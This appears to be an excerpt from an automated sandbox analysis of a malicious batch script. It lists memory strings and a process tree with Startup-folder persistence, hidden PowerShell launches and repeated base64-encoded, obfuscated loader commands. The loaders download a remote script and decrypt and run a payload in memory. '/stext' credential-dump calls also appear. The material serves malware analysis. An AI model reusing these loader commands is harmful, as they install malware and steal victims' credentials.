                Source: powershell.exe, 0000000E.00000002.1526632717.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: powershell.exe, 0000000E.00000002.1526632717.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: powershell.exe, 0000000E.00000002.1526632717.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: powershell.exe, 0000000E.00000002.1526632717.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: powershell.exe, 0000000E.00000002.1527715092.00000000030B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: powershell.exe, 0000000E.00000002.1526632717.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_15-33186
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\puDUCOeVK6.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\puDUCOeVK6.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_77a2dde7.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_77a2dde7.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ilwtojl"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\ilwtojl"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\sfcepcvxio"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\vhpwquorvxkde"
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e0484b8.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e0484b8.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_56945484.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_56945484.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_be60077b.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_be60077b.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
